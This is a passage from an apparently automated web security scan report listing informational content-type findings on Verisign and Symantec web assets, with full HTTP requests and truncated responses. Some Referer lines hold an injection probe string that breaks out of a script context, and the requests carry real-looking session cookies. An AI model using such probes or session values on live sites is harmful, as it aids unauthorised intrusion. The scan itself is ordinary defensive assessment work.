Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:47 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT
Accept-Ranges: bytes
Content-Length: 14365
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:24:47 GMT
Content-Type: image/jpeg

GIF89a.....................3.....K..{...................................................................................s...............................s...u....Bh..................... !!.....f...QXVw
...[SNIP]...

23.54. http://www.verisign.com/authweb/global/assets/shared/js/globals.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/globals.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/globals.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 3608
Content-Type: text/html


/*******************************************
**             Utility functions             **
*******************************************/


function linkPopUp(url) {
popupWin = window.open
...[SNIP]...

23.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.boxshadow.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1538
Content-Type: text/html

/* **
* jquery-boxshadow.js
*
* $(object).boxshadow({
* hOffset : 3,
* vOffset : 3,
* shadowblur : 3,
* color : '#808080'
* })
*
* If you are using this with IE, you should s
...[SNIP]...

23.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.cacheimage.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1356
Content-Type: text/html

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

23.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:08 GMT
Content-Type: text/html
Content-Length: 15622

/*
* FancyBox - jQuery Plugin
* Simple and fancy lightbox alternative
*
* Examples and documentation at: http://fancybox.net
*
* Copyright (c) 2008 - 2010 Janis Skarnelis
* That said, it is har
...[SNIP]...

23.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.hover_intent.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1614
Content-Type: text/html

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...

23.59. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/jquery.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /authweb/global/assets/shared/js/jquery.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:16 GMT
Content-Type: text/html
Content-Length: 78803

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

23.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.custom.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Length: 985
Content-Type: text/html

$(document).ready (function(){
   bannerFadeIn = 0;
   bannerFadeOut = 0;
   $("#prevnext a.prev").click(function(e){
       var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) +
...[SNIP]...

23.61. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Length: 4102
Content-Type: text/html


var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

23.62. http://www.verisign.com/stellent/groups/public/documents/image/dev041741.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /stellent/groups/public/documents/image/dev041741.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /stellent/groups/public/documents/image/dev041741.jpg HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:46 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:34:54 GMT
Accept-Ranges: bytes
Content-Length: 3231
Expires: Sun, 09 Oct 2011 21:59:46 GMT
Content-Type: image/jpeg

GIF89a..9.....dz.Ki.e|.....7........".r............D....z........Hd....../22....Ti......iii.)Q...............}}}.....A........+...aaa.....JKK...XXX.$..*J.......q.................Rr........).......f{.
...[SNIP]...

23.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.custom.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/rotator.custom.js HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://www.verisign.com/products-services/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:48 GMT
Content-Length: 985
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

$(document).ready (function(){
   bannerFadeIn = 0;
   bannerFadeOut = 0;
   $("#prevnext a.prev").click(function(e){
       var currIndex = $("#banner-controls a").index($("#banner-controls a.selected")) +
...[SNIP]...

23.64. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.verisign.com
Path:   /authweb/global/assets/shared/js/rotator.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1
Host: www.verisign.com
Connection: keep-alive
Referer: https://www.verisign.com/products-services/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:48 GMT
Content-Length: 4102
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

24. Content type is not specified

There are 19 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


24.1. https://fileconnect.symantec.com/javascript/calendar2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fileconnect.symantec.com
Path:   /javascript/calendar2.js

Request

GET /javascript/calendar2.js HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:54 GMT
Content-length: 6722
Last-Modified: Sat, 21 May 2011 05:26:42 GMT
Accept-Ranges: bytes

// Title: Tigra Calendar
// Description: See the demo at url
// URL: http://www.softcomplex.com/products/tigra_calendar/
// Version: 3.1 (American date format)
// Date: 08-08-2002 (mm-dd-yyyy)
//
...[SNIP]...

24.2. https://fileconnect.symantec.com/javascript/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fileconnect.symantec.com
Path:   /javascript/s_code.js

Request

GET /javascript/s_code.js HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:54 GMT
Content-length: 15081
Last-Modified: Sat, 21 May 2011 05:26:42 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.14. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */
/* Specify the Report Suite ID(s) to track here */

//s_account="devsymantec
...[SNIP]...

24.3. https://fileconnect.symantec.com/javascript/validations.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fileconnect.symantec.com
Path:   /javascript/validations.js

Request

GET /javascript/validations.js HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:54 GMT
Content-length: 10399
Last-Modified: Sat, 21 May 2011 05:26:42 GMT
Accept-Ranges: bytes

var dtCh= "/";

function trim(strText)
{
// this will get rid of leading spaces
while (strText.substring(0,1) == ' ')
strText = strText.substring(1, strText.length);

// th
...[SNIP]...

24.4. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forms.verisign.com
Path:   /websurveys/servlet/ActionMultiplexer

Request

GET /websurveys/servlet/ActionMultiplexer HTTP/1.1
Host: forms.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 36
Date: Fri, 09 Sep 2011 21:41:07 GMT

Missing or unknown action ID: null

24.5. http://l.player.ooyala.com/verify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.player.ooyala.com
Path:   /verify

Request

POST /verify?ts=1315621578937 HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
Content-Length: 1
Origin: http://www.verisign.ch
x-verify: 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&sig=0WnlcCNiv6U713lWFHQF
